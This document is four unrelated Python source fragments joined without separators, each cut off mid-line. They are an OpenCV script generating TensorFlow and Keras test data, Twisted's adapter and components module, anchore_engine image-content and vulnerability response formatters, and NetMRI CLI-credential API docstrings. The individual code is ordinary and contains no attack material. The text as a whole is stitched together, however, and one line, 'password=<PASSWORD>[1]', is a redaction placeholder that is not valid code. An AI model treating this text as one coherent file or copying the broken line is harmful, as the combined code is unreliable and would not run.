name='keras_deconv_valid', input_shape=(4, 5, 2))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_deconv_valid_input:0'), sess.graph.get_tensor_by_name('keras_deconv_valid/BiasAdd:0'), 'keras_deconv_valid', optimize=True) ################################################################################ model = K.models.Sequential() model.add(K.layers.Conv2DTranspose(filters=4, kernel_size=3, strides=(2, 2), data_format='channels_last', name='keras_deconv_same', input_shape=(4, 5, 2), padding='same')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_deconv_same_input:0'), sess.graph.get_tensor_by_name('keras_deconv_same/BiasAdd:0'), 'keras_deconv_same', optimize=True) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') resized = tf.image.resize_bilinear(inp, size=[9, 8], name='resize_bilinear') save(inp, resized, 'resize_bilinear') ################################################################################ inp = tf.placeholder(tf.float32, [None, 3, 4, 5], 'input') resized = tf.image.resize_bilinear(inp, size=[tf.shape(inp)[1]*2, tf.shape(inp)[2]*3], name='resize_bilinear_factor') sub_add = resized - 0.3 + 0.3 save(inp, sub_add, 'resize_bilinear_factor', optimize=False) ################################################################################ model = K.models.Sequential() model.add(K.layers.SeparableConv2D(filters=4, kernel_size=3, strides=(1, 1), dilation_rate=(2, 3), name='keras_atrous_conv2d_same', input_shape=(11, 12, 2), padding='same')) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_atrous_conv2d_same_input:0'), sess.graph.get_tensor_by_name('keras_atrous_conv2d_same/BiasAdd:0'), 'keras_atrous_conv2d_same', optimize=True) ################################################################################ # Generate test data for Faster-RCNN object detection model from TensorFlow # model zoo, http://download.tensorflow.org/models/object_detection/faster_rcnn_inception_v2_coco_2018_01_28.tar.gz for name in ['faster_rcnn_inception_v2_coco_2018_01_28', 'faster_rcnn_resnet50_coco_2018_01_28']: with tf.gfile.FastGFile(os.path.join('..', name + '.pb')) as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output inp = cv.imread('../dog416.png') inp = cv.resize(inp, (800, 600)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), # localSession.graph.get_tensor_by_name('detection_scores:0'), # localSession.graph.get_tensor_by_name('detection_boxes:0'), # localSession.graph.get_tensor_by_name('detection_classes:0')], # feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] - 1 detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save(name + '.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [1, 2, 3, 4], 'input') conv1 = tf.layers.conv2d(inp, filters=4, kernel_size=[1, 1]) conv2 = tf.layers.conv2d(inp, filters=4, kernel_size=[1, 1]) flatten1 = tf.contrib.layers.flatten(conv1) flatten2 = tf.contrib.layers.flatten(conv2) concat = tf.concat([flatten1, flatten2], axis=1) bias = tf.contrib.layers.bias_add(concat) # Add zeros (it has NHWC data format flag) save(inp, bias, 'concat_axis_1') ################################################################################ inp = tf.placeholder(tf.float32, [1, 3, 5, 8], 'input') # NCHW input conv = tf.layers.conv2d(inp, filters=4, kernel_size=[2, 3], data_format='channels_first') pool = tf.layers.max_pooling2d(conv, pool_size=2, strides=2, data_format='channels_first') save(inp, pool, 'conv_pool_nchw') # Input and output have been transposed (see writeBlob) for name in ['conv_pool_nchw_in.npy', 'conv_pool_nchw_out.npy']: np.save(name, np.load(name).transpose(0, 2, 3, 1)) ################################################################################ model = K.models.Sequential() model.add(K.layers.UpSampling2D(size=(3, 2), data_format='channels_last', name='keras_upsampling2d', input_shape=(2, 3, 4))) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_upsampling2d_input:0'), sess.graph.get_tensor_by_name('keras_upsampling2d/ResizeNearestNeighbor:0'), 'keras_upsampling2d') ################################################################################ # Generate test data for MobileNet-SSD object detection model from TensorFlow # model zoo, http://download.tensorflow.org/models/object_detection/ssd_mobilenet_v1_ppn_shared_box_predictor_300x300_coco14_sync_2018_07_03.tar.gz with tf.gfile.FastGFile('../ssd_mobilenet_v1_ppn_coco.pb') as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output img = cv.imread('../dog416.png') inp = cv.resize(img, (300, 300)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), # localSession.graph.get_tensor_by_name('detection_scores:0'), # localSession.graph.get_tensor_by_name('detection_boxes:0'), # localSession.graph.get_tensor_by_name('detection_classes:0')], # feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save('ssd_mobilenet_v1_ppn_coco.detection_out.npy', detections) ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3], 'input') flatten = tf.reshape(inp, [-1, 2*3], 'planar') reshaped = tf.reshape(flatten, tf.shape(inp), 'reshape') save(inp, reshaped, 'reshape_as_shape', optimize=False) ################################################################################ with tf.gfile.FastGFile('../mask_rcnn_inception_v2_coco_2018_01_28.pb') as f: # Load the model graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) with tf.Session(graph=tf.Graph()) as localSession: # Restore session localSession.graph.as_default() tf.import_graph_def(graph_def, name='') # Receive output img = cv.imread('../street.png') inp = cv.resize(img, (800, 800)) inp = inp[:, :, [2, 1, 0]] # BGR2RGB out = localSession.run([localSession.graph.get_tensor_by_name('num_detections:0'), localSession.graph.get_tensor_by_name('detection_scores:0'), localSession.graph.get_tensor_by_name('detection_boxes:0'), localSession.graph.get_tensor_by_name('detection_classes:0'), localSession.graph.get_tensor_by_name('detection_masks:0')], feed_dict={'image_tensor:0': inp.reshape(1, inp.shape[0], inp.shape[1], 3)}) # Pack detections in format [id, class_id, confidence, left, top, right, bottom] num_detections = int(out[0][0]) detections = np.zeros([1, 1, num_detections, 7], np.float32) detections[0, 0, :, 1] = out[3][0, :num_detections] - 1 detections[0, 0, :, 2] = out[1][0, :num_detections] detections[0, 0, :, 3:] = out[2][:, :num_detections, [1, 0, 3, 2]] np.save('mask_rcnn_inception_v2_coco_2018_01_28.detection_out.npy', detections) np.save('mask_rcnn_inception_v2_coco_2018_01_28.detection_masks.npy', out[4]) ################################################################################ inp = K.Input(shape=(2, 3, 4), name='keras_pad_concat_input', batch_size=1) conv = K.layers.Conv2D(filters=4, kernel_size=1, data_format='channels_last', name='keras_pad_concat_conv', input_shape=(2, 3, 4))(inp) def pad_depth(x, desired_channels): y = K.backend.random_uniform_variable(x.shape.as_list()[:-1] + [desired_channels], low=0, high=1) return K.layers.concatenate([x, y]) pad = K.layers.Lambda(pad_depth, arguments={'desired_channels': 5}, name='keras_pad_concat')(conv) sess = K.backend.get_session() sess.as_default() save(sess.graph.get_tensor_by_name('keras_pad_concat_input:0'), sess.graph.get_tensor_by_name('keras_pad_concat/concatenate/concat:0'), 'keras_pad_concat', optimize=False) ################################################################################ inp = tf.placeholder(tf.float32, [2, 3, 4, 5], 'input') conv = tf.layers.conv2d(inp, filters=5, kernel_size=[1, 1], bias_initializer=tf.random_normal_initializer()) sub = conv - inp save(inp, sub, 'eltwise_sub') ################################################################################ inp = tf.placeholder(tf.float32, [None, 2, 3, 4], 'input') conv = tf.layers.conv2d(inp, filters=3, kernel_size=[1, 1]) softmax = tf.contrib.slim.softmax(conv) save(inp, softmax, 'slim_softmax') ################################################################################ # issue https://github.com/opencv/opencv/issues/14224 inp_node = 'img_inputs' out_node = 'MobileFaceNet/MobileFaceNet/Conv2d_0/add' with tf.Session(graph=tf.Graph()) as localSession: localSession.graph.as_default() with tf.gfile.FastGFile('frozen_model.pb') as f: graph_def = tf.GraphDef() graph_def.ParseFromString(f.read()) for node in graph_def.node: if node.name == inp_node: del node.attr['shape'] tf.import_graph_def(graph_def, name='') inputData = gen_data(tf.placeholder(tf.float32, [1, 4, 5, 3], inp_node)) outputData = localSession.run(localSession.graph.get_tensor_by_name(out_node + ':0'), feed_dict={inp_node + ':0': inputData}) writeBlob(inputData, 'slim_batch_norm_in') writeBlob(outputData, 'slim_batch_norm_out') graph_def = TransformGraph(graph_def, [inp_node], [out_node], ['fold_constants', 'strip_unused_nodes']) with tf.gfile.FastGFile('slim_batch_norm_net.pb', 'wb') as f: f.write(graph_def.SerializeToString()) ################################################################################ # issue
# -*- test-case-name: twisted.python.test.test_components -*- # Copyright (c) Twisted Matrix Laboratories. # See LICENSE for details. """ Component architecture for Twisted, based on Zope3 components. Using the Zope3 API directly is strongly recommended. Everything you need is in the top-level of the zope.interface package, e.g.:: from zope.interface import Interface, implementer class IFoo(Interface): pass @implementer(IFoo) class Foo: print(IFoo.implementedBy(Foo)) # True print(IFoo.providedBy(Foo())) # True L{twisted.python.components.registerAdapter} from this module may be used to add to Twisted's global adapter registry. L{twisted.python.components.proxyForInterface} is a factory for classes which allow access to only the parts of another class defined by a specified interface. """ from __future__ import division, absolute_import, print_function # zope3 imports from zope.interface import interface, declarations from zope.interface.adapter import AdapterRegistry # twisted imports from twisted.python.compat import NativeStringIO from twisted.python import reflect # Twisted's global adapter registry globalRegistry = AdapterRegistry() # Attribute that registerAdapter looks at. Is this supposed to be public? ALLOW_DUPLICATES = 0 # Define a function to find the registered adapter factory, using either a # version of Zope Interface which has the `registered' method or an older # version which does not. if getattr(AdapterRegistry, 'registered', None) is None: def _registered(registry, required, provided): """ Return the adapter factory for the given parameters in the given registry, or None if there is not one. """ return registry.get(required).selfImplied.get(provided, {}).get('') else: def _registered(registry, required, provided): """ Return the adapter factory for the given parameters in the given registry, or None if there is not one. """ return registry.registered([required], provided) def registerAdapter(adapterFactory, origInterface, *interfaceClasses): """Register an adapter class. An adapter class is expected to implement the given interface, by adapting instances implementing 'origInterface'. An adapter class's __init__ method should accept one parameter, an instance implementing 'origInterface'. """ self = globalRegistry assert interfaceClasses, "You need to pass an Interface" global ALLOW_DUPLICATES # deal with class->interface adapters: if not isinstance(origInterface, interface.InterfaceClass): origInterface = declarations.implementedBy(origInterface) for interfaceClass in interfaceClasses: factory = _registered(self, origInterface, interfaceClass) if factory is not None and not ALLOW_DUPLICATES: raise ValueError("an adapter (%s) was already registered." % (factory, )) for interfaceClass in interfaceClasses: self.register([origInterface], interfaceClass, '', adapterFactory) def getAdapterFactory(fromInterface, toInterface, default): """Return registered adapter for a given class and interface. Note that is tied to the *Twisted* global registry, and will thus not find adapters registered elsewhere. """ self = globalRegistry if not isinstance(fromInterface, interface.InterfaceClass): fromInterface = declarations.implementedBy(fromInterface) factory = self.lookup1(fromInterface, toInterface) if factory is None: factory = default return factory def _addHook(registry): """ Add an adapter hook which will attempt to look up adapters in the given registry. @type registry: L{zope.interface.adapter.AdapterRegistry} @return: The hook which was added, for later use with L{_removeHook}. """ lookup = registry.lookup1 def _hook(iface, ob): factory = lookup(declarations.providedBy(ob), iface) if factory is None: return None else: return factory(ob) interface.adapter_hooks.append(_hook) return _hook def _removeHook(hook): """ Remove a previously added adapter hook. @param hook: An object previously returned by a call to L{_addHook}. This will be removed from the list of adapter hooks. """ interface.adapter_hooks.remove(hook) # add global adapter lookup hook for our newly created registry _addHook(globalRegistry) def getRegistry(): """Returns the Twisted global C{zope.interface.adapter.AdapterRegistry} instance. """ return globalRegistry # FIXME: deprecate attribute somehow? CannotAdapt = TypeError class Adapter: """I am the default implementation of an Adapter for some interface. This docstring contains a limerick, by popular demand:: Subclassing made Zope and TR much harder to work with by far. So before you inherit, be sure to declare it Adapter, not PyObject* @cvar temporaryAdapter: If this is True, the adapter will not be persisted on the Componentized. @cvar multiComponent: If this adapter is persistent, should it be automatically registered for all appropriate interfaces. """ # These attributes are used with Componentized. temporaryAdapter = 0 multiComponent = 1 def __init__(self, original): """Set my 'original' attribute to be the object I am adapting. """ self.original = original def __conform__(self, interface): """ I forward __conform__ to self.original if it has it, otherwise I simply return None. """ if hasattr(self.original, "__conform__"): return self.original.__conform__(interface) return None def isuper(self, iface, adapter): """ Forward isuper to self.original """ return self.original.isuper(iface, adapter) class Componentized: """I am a mixin to allow you to be adapted in various ways persistently. I define a list of persistent adapters. This is to allow adapter classes to store system-specific state, and initialized on demand. The getComponent method implements this. You must also register adapters for this class for the interfaces that you wish to pass to getComponent. Many other classes and utilities listed here are present in Zope3; this one is specific to Twisted. """ persistenceVersion = 1 def __init__(self): self._adapterCache = {} def locateAdapterClass(self, klass, interfaceClass, default): return getAdapterFactory(klass, interfaceClass, default) def setAdapter(self, interfaceClass, adapterClass): """ Cache a provider for the given interface, by adapting C{self} using the given adapter class. """ self.setComponent(interfaceClass, adapterClass(self)) def addAdapter(self, adapterClass, ignoreClass=0): """Utility method that calls addComponent. I take an adapter class and instantiate it with myself as the first argument. @return: The adapter instantiated. """ adapt = adapterClass(self) self.addComponent(adapt, ignoreClass) return adapt def setComponent(self, interfaceClass, component): """ Cache a provider of the given interface. """ self._adapterCache[reflect.qual(interfaceClass)] = component def addComponent(self, component, ignoreClass=0): """ Add a component to me, for all appropriate interfaces. In order to determine which interfaces are appropriate, the component's provided interfaces will be scanned. If the argument 'ignoreClass' is True, then all interfaces are considered appropriate. Otherwise, an 'appropriate' interface is one for which its class has been registered as an adapter for my class according to the rules of getComponent. @return: the list of appropriate interfaces """ for iface in declarations.providedBy(component): if (ignoreClass or (self.locateAdapterClass(self.__class__, iface, None) == component.__class__)): self._adapterCache[reflect.qual(iface)] = component def unsetComponent(self, interfaceClass): """Remove my component specified by the given interface class.""" del self._adapterCache[reflect.qual(interfaceClass)] def removeComponent(self, component): """ Remove the given component from me entirely, for all interfaces for which it has been registered. @return: a list of the interfaces that were removed. """ l = [] for k, v in list(self._adapterCache.items()): if v is component: del self._adapterCache[k] l.append(reflect.namedObject(k)) return l def getComponent(self, interface, default=None): """Create or retrieve an adapter for the given interface. If such an adapter has already been created, retrieve it from the cache that this instance keeps of all its adapters. Adapters created through this mechanism may safely store system-specific state. If you want to register an adapter that will be created through getComponent, but you don't require (or don't want) your adapter to be cached and kept alive for the lifetime of this Componentized object, set the attribute 'temporaryAdapter' to True on your adapter class. If you want to automatically register an adapter for all appropriate interfaces (with addComponent), set the attribute 'multiComponent' to True on your adapter class. """ k = reflect.qual(interface) if k in self._adapterCache: return self._adapterCache[k] else: adapter = interface.__adapt__(self) if adapter is not None and not ( hasattr(adapter, "temporaryAdapter") and adapter.temporaryAdapter): self._adapterCache[k] = adapter if (hasattr(adapter, "multiComponent") and adapter.multiComponent): self.addComponent(adapter) if adapter is None: return default return adapter def __conform__(self, interface): return self.getComponent(interface) class ReprableComponentized(Componentized): def __init__(self): Componentized.__init__(self) def __repr__(self): from pprint import pprint sio = NativeStringIO() pprint(self._adapterCache, sio) return sio.getvalue() def proxyForInterface(iface, originalAttribute='original'): """ Create a class which proxies all method calls which adhere to an interface to another provider of that interface. This function is intended for creating specialized proxies. The typical way to use it is by subclassing the result:: class MySpecializedProxy(proxyForInterface(IFoo)): def someInterfaceMethod(self, arg): if arg == 3: return 3 return self.original.someInterfaceMethod(arg) @param iface: The Interface to which the resulting object will conform, and which the wrapped object must provide. @param originalAttribute: name of the attribute used to save the original object in the resulting class. Default to C{original}. @type originalAttribute: C{str} @return: A class whose constructor takes the original object as its only argument. Constructing the class creates the proxy. """ def __init__(self, original): setattr(self, originalAttribute, original) contents = {"__init__": __init__} for name in iface: contents[name] = _ProxyDescriptor(name, originalAttribute) proxy = type("(Proxy for %s)" % (reflect.qual(iface),), (object,), contents) declarations.classImplements(proxy, iface) return proxy class _ProxiedClassMethod(object): """ A proxied class method. @ivar methodName: the name of the method which this should invoke when
import json import stat import datetime import base64 from flask import request from anchore_engine import utils from anchore_engine.clients import catalog import anchore_engine.services.common from anchore_engine.subsys import taskstate, logger import anchore_engine.configuration.localconfig import anchore_engine.clients.policy_engine import anchore_engine.subsys.metrics from anchore_engine.subsys.metrics import flask_metrics def make_response_content(content_type, content_data): ret = [] if content_type not in anchore_engine.services.common.image_content_types + anchore_engine.services.common.image_metadata_types: logger.warn("input content_type ("+str(content_type)+") not supported ("+str(anchore_engine.services.common.image_content_types)+")") return(ret) if not content_data: logger.warn("empty content data given to format - returning empty result") return(ret) # type-specific formatting of content data if content_type == 'os': elkeys = ['license', 'origin', 'size', 'type', 'version'] for package in list(content_data.keys()): el = {} try: el['package'] = package for k in elkeys: if k in content_data[package]: el[k] = content_data[package][k] else: el[k] = None except: el = {} if el: ret.append(el) elif content_type == 'npm': for package in list(content_data.keys()): el = {} try: el['package'] = content_data[package]['name'] el['type'] = 'NPM' el['location'] = package el['version'] = content_data[package]['versions'][0] el['origin'] = ','.join(content_data[package]['origins']) or 'Unknown' el['license'] = ' '.join(content_data[package]['lics']) or 'Unknown' except: el = {} if el: ret.append(el) elif content_type == 'gem': for package in list(content_data.keys()): el = {} try: el['package'] = content_data[package]['name'] el['type'] = 'GEM' el['location'] = package el['version'] = content_data[package]['versions'][0] el['origin'] = ','.join(content_data[package]['origins']) or 'Unknown' el['license'] = ' '.join(content_data[package]['lics']) or 'Unknown' except: el = {} if el: ret.append(el) elif content_type == 'python': for package in list(content_data.keys()): el = {} try: el['package'] = content_data[package]['name'] el['type'] = 'PYTHON' el['location'] = content_data[package]['location'] el['version'] = content_data[package]['version'] el['origin'] = content_data[package]['origin'] or 'Unknown' el['license'] = content_data[package]['license'] or 'Unknown' except: el = {} if el: ret.append(el) elif content_type == 'java': for package in list(content_data.keys()): el = {} try: el['package'] = content_data[package]['name'] el['type'] = content_data[package]['type'].upper() el['location'] = content_data[package]['location'] el['specification-version'] = content_data[package]['specification-version'] el['implementation-version'] = content_data[package]['implementation-version'] el['maven-version'] = content_data[package]['maven-version'] el['origin'] = content_data[package]['origin'] or 'Unknown' except: el = {} if el: ret.append(el) elif content_type == 'files': elmap = { 'linkdst': 'linkdest', 'size': 'size', 'mode': 'mode', 'sha256': 'sha256', 'type': 'type', 'uid': 'uid', 'gid': 'gid' } for filename in list(content_data.keys()): el = {} try: el['filename'] = filename for elkey in list(elmap.keys()): try: el[elmap[elkey]] = content_data[filename][elkey] except: el[elmap[elkey]] = None # special formatting #el['mode'] = oct(stat.S_IMODE(el['mode'])) el['mode'] = format(stat.S_IMODE(el['mode']), '05o') if el['sha256'] == 'DIRECTORY_OR_OTHER': el['sha256'] = None except Exception as err: el = {} if el: ret.append(el) elif content_type in ['docker_history']: try: ret = utils.ensure_str(base64.encodebytes(utils.ensure_bytes(json.dumps(content_data)))) except Exception as err: logger.warn("could not convert content to json/base64 encode - exception: {}".format(err)) ret = "" elif content_type in ['manifest', 'dockerfile']: try: ret = utils.ensure_str(base64.encodebytes(utils.ensure_bytes(content_data))) except Exception as err: logger.warn("could not base64 encode content - exception: {}".format(err)) ret = "" else: ret = content_data return(ret) def make_response_vulnerability(vulnerability_type, vulnerability_data): ret = [] if not vulnerability_data: logger.warn("empty query data given to format - returning empty result") return (ret) eltemplate = { 'vuln': 'None', 'severity': 'None', 'url': 'None', 'fix': 'None', 'package': 'None', 'package_name': 'None', 'package_version': 'None', 'package_type': 'None', 'package_cpe': 'None', 'package_path': 'None', 'feed': 'None', 'feed_group': 'None', } if vulnerability_type == 'os': keymap = { 'vuln': 'CVE_ID', 'severity': 'Severity', 'package': 'Vulnerable_Package', 'fix': 'Fix_Available', 'url': 'URL', 'package_type': 'Package_Type', 'feed': 'Feed', 'feed_group': 'Feed_Group', 'package_name': 'Package_Name', 'package_version': 'Package_Version', } scan_result = vulnerability_data['legacy_report'] try: for imageId in list(scan_result.keys()): header = scan_result[imageId]['result']['header'] rows = scan_result[imageId]['result']['rows'] for row in rows: el = {} el.update(eltemplate) for k in list(keymap.keys()): try: el[k] = row[header.index(keymap[k])] except: el[k] = 'None' # conversions if el[k] == 'N/A': el[k] = 'None' ret.append(el) except Exception as err: logger.warn("could not prepare query response - exception: " + str(err)) ret = [] elif vulnerability_type == 'non-os': keymap = { 'vuln': 'vulnerability_id', 'severity': 'severity', 'package_name': 'name', 'package_version': 'version', 'package_path': 'pkg_path', 'package_type': 'pkg_type', 'package_cpe': 'cpe', 'url': 'link', 'feed': 'feed_name', 'feed_group': 'feed_namespace', } scan_result = vulnerability_data['cpe_report'] for vuln in scan_result: el = {} el.update(eltemplate) for k in list(keymap.keys()): el[k] = vuln[keymap[k]] el['package'] = "{}-{}".format(vuln['name'], vuln['version']) ret.append(el) else: ret = vulnerability_data return (ret) def make_response_policyeval(user_auth, eval_record, params): ret = {} userId, pw = user_auth try: tag = eval_record['tag'] ret[tag] = {} if eval_record['evalId'] and eval_record['policyId']: ret[tag]['detail'] = {} if params and 'detail' in params and params['detail']: eval_data = catalog.get_document(user_auth, 'policy_evaluations', eval_record['evalId']) # ret[tag]['detail']['result'] = json.loads(eval_data) ret[tag]['detail']['result'] = eval_data bundle_data = catalog.get_document(user_auth, 'policy_bundles', eval_record['policyId']) # ret[tag]['detail']['policy'] = json.loads(bundle_data) ret[tag]['detail']['policy'] = bundle_data ret[tag]['policyId'] = eval_record['policyId'] if eval_record['final_action'].upper() in ['GO', 'WARN']: ret[tag]['status'] = 'pass' else: ret[tag]['status'] = 'fail' ret[tag]['last_evaluation'] = datetime.datetime.utcfromtimestamp(eval_record['created_at']).isoformat() + 'Z' else: ret[tag]['policyId'] = "N/A" ret[tag]['final_action'] = "fail" ret[tag]['last_evaluation'] = "N/A" ret[tag]['detail'] = {} except Exception as err: raise Exception("failed to format policy eval response: " + str(err)) return (ret) def make_response_image(user_auth, image_record, params={}): ret = image_record image_content = {'metadata': {}} for key in ['arch', 'distro', 'distro_version', 'dockerfile_mode', 'image_size', 'layer_count']: val = image_record.pop(key, None) image_content['metadata'][key] = val image_record['image_content'] = image_content if image_record['annotations']: try: annotation_data = json.loads(image_record['annotations']) image_record['annotations'] = annotation_data except: pass # try to assemble full strings if image_record and 'image_detail' in image_record: for image_detail in image_record['image_detail']: try: image_detail['fulldigest'] = image_detail['registry'] + "/" + image_detail['repo'] + "@" + image_detail[ 'digest'] image_detail['fulltag'] = image_detail['registry'] + "/" + image_detail['repo'] + ":" + image_detail[ 'tag'] except: image_detail['fulldigest'] = None image_detail['fulltag'] = None for removekey in ['record_state_val', 'record_state_key']: image_detail.pop(removekey, None) for datekey in ['last_updated', 'created_at', 'tag_detected_at']: try: image_detail[datekey] = datetime.datetime.utcfromtimestamp(image_detail[datekey]).isoformat() + 'Z' except: pass if params and 'detail' in params and not params['detail']: image_record['image_detail'] = [] for datekey in ['last_updated', 'created_at', 'analyzed_at']: try: image_record[datekey] = datetime.datetime.utcfromtimestamp(image_record[datekey]).isoformat() +'Z' except: pass for removekey in ['record_state_val', 'record_state_key']: image_record.pop(removekey, None) return (ret) def impl_template(request_inputs): user_auth = request_inputs['auth'] method = request_inputs['method'] bodycontent = request_inputs['bodycontent'] params = request_inputs['params'] return_object = {} httpcode = 500 try: pass except Exception as err: return_object = anchore_engine.services.common.make_response_error(err, in_httpcode=httpcode) httpcode = return_object['httpcode'] return (return_object, httpcode) def lookup_imageDigest_from_imageId(request_inputs, imageId): user_auth = request_inputs['auth'] method = request_inputs['method'] bodycontent = request_inputs['bodycontent'] params = request_inputs['params'] userId, pw = user_auth ret = None try: image_records = catalog.get_image(user_auth, imageId=imageId) if image_records: image_record = image_records[0] imageDigest = image_record['imageDigest'] ret = imageDigest except Exception as err: logger.debug("operation exception: " + str(err)) raise err return (ret) def vulnerability_query(request_inputs, vulnerability_type, doformat=False): user_auth = request_inputs['auth'] method = request_inputs['method'] bodycontent = request_inputs['bodycontent'] params = request_inputs['params'] return_object = {} httpcode = 500 userId, pw = user_auth localconfig = anchore_engine.configuration.localconfig.get_config() system_user_auth = localconfig['system_user_auth'] verify = localconfig['internal_ssl_verify'] force_refresh = params.get('force_refresh', False) vendor_only = params.get('vendor_only', True) try: if vulnerability_type not in anchore_engine.services.common.image_vulnerability_types + ['all']: httpcode = 404 raise Exception("content type ("+str(vulnerability_type)+") not available") tag = params.pop('tag', None) imageDigest = params.pop('imageDigest', None) digest = params.pop('digest', None) image_reports = catalog.get_image(user_auth, tag=tag, digest=digest, imageDigest=imageDigest) for image_report in image_reports: if image_report['analysis_status'] != taskstate.complete_state('analyze'): httpcode = 404 raise Exception("image is not analyzed - analysis_status: " + image_report['analysis_status']) imageDigest = image_report['imageDigest'] try: image_detail = image_report['image_detail'][0] imageId = image_detail['imageId'] client = anchore_engine.clients.policy_engine.get_client(user=system_user_auth[0], password=<PASSWORD>[1], verify_ssl=verify) resp = client.get_image_vulnerabilities(user_id=userId, image_id=imageId, force_refresh=force_refresh, vendor_only=vendor_only) if doformat: if vulnerability_type == 'all': ret = [] for vtype in anchore_engine.services.common.image_vulnerability_types: ret = ret + make_response_vulnerability(vtype, resp.to_dict()) #return_object[imageDigest] = make_response_vulnerability(vulnerability_type, resp.to_dict()) else: ret = make_response_vulnerability(vulnerability_type, resp.to_dict()) return_object[imageDigest] = ret else: return_object[imageDigest] = resp.to_dict() httpcode = 200 except Exception as err: httpcode = 500 raise Exception("could not fetch vulnerabilities - exception: " + str(err)) httpcode = 200 except Exception as err: return_object = anchore_engine.services.common.make_response_error(err, in_httpcode=httpcode) httpcode = return_object['httpcode'] return (return_object, httpcode) def get_content(request_inputs, content_type, doformat=False): user_auth = request_inputs['auth'] method = request_inputs['method'] bodycontent = request_inputs['bodycontent'] params = request_inputs['params'] return_object = {} httpcode = 500 userId, pw = user_auth try: if content_type not in anchore_engine.services.common.image_content_types + anchore_engine.services.common.image_metadata_types: httpcode = 404 raise Exception("content type ("+str(content_type)+") not available") tag = params.pop('tag', None) imageDigest = params.pop('imageDigest', None) digest = params.pop('digest', None) image_reports = catalog.get_image(user_auth, tag=tag, digest=digest, imageDigest=imageDigest) for image_report in image_reports: if image_report['analysis_status'] != taskstate.complete_state('analyze'): httpcode = 404 raise Exception("image is not analyzed - analysis_status: " + image_report['analysis_status']) imageDigest = image_report['imageDigest'] if content_type == 'manifest': try: image_manifest_data = catalog.get_document(user_auth, 'manifest_data', imageDigest) except Exception as err: raise anchore_engine.services.common.make_anchore_exception(err, input_message="cannot fetch content data {} from archive".format(content_type), input_httpcode=500) image_content_data = { 'manifest': image_manifest_data } else: try: image_content_data = catalog.get_document(user_auth, 'image_content_data', imageDigest) except Exception as err: raise anchore_engine.services.common.make_anchore_exception(err, input_message="cannot fetch content data from archive", input_httpcode=500) # special handler for dockerfile contents from old method to new if content_type == 'dockerfile' and not image_content_data.get('dockerfile', None): try: if image_report.get('dockerfile_mode', None) ==
version max:`` None | ``required:`` False | ``default:`` USER :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. :type Origination: String | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param PasswordSecure: The password portion of the credential. :type PasswordSecure: String | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param Priority: The priority order in which to attempt this credential. :type Priority: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` ANY :param Protocol: The protocol for which to use this credential. :type Protocol: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` LOCAL :param UPWUse: Determines the function of the credential. 'GUESS' indicates that this will only be used if vendor default credential collection is enabled, whereas 'LOCAL' means that this credential will be used in all guessing. :type UPWUse: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` 0 :param UnitID: The internal NetMRI identifier for the NetMRI collector on which the credential is configured. :type UnitID: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param UsernameSecure: The username portion of the credential. :type UsernameSecure: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` ANY :param Vendor: The vendor devices against which to try this credential. :type Vendor: String **Outputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return id: The id of the newly created cli credential. :rtype id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return model: The class name of the newly created cli credential. :rtype model: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return uri: A URI that may be used to retrieve the newly created cli credential. :rtype uri: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :return cli_credential: The newly created cli credential. :rtype cli_credential: CLICredential """ return self.api_request(self._get_method_fullname("create"), kwargs) def update(self, **kwargs): """Updates an existing cli credential. **Inputs** | ``api version min:`` None | ``api version max:`` None | ``required:`` True | ``default:`` None :param id: The internal NetMRI identifier for this credential. :type id: Integer | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param Origination: Identifies the source of the credential. 'NETC' indicates an internal credential that may be modified or removed during upgrade processes. 'USER' indicates a user-entered credential. If omitted, this field will not be updated. :type Origination: String | ``api version min:`` None | ``api version max:`` None | ``required:`` False | ``default:`` None :param PasswordSecure: The password portion of the credential. If omitted, this field will not be updated. :type PasswordSecure: String | ``api version min:`` None 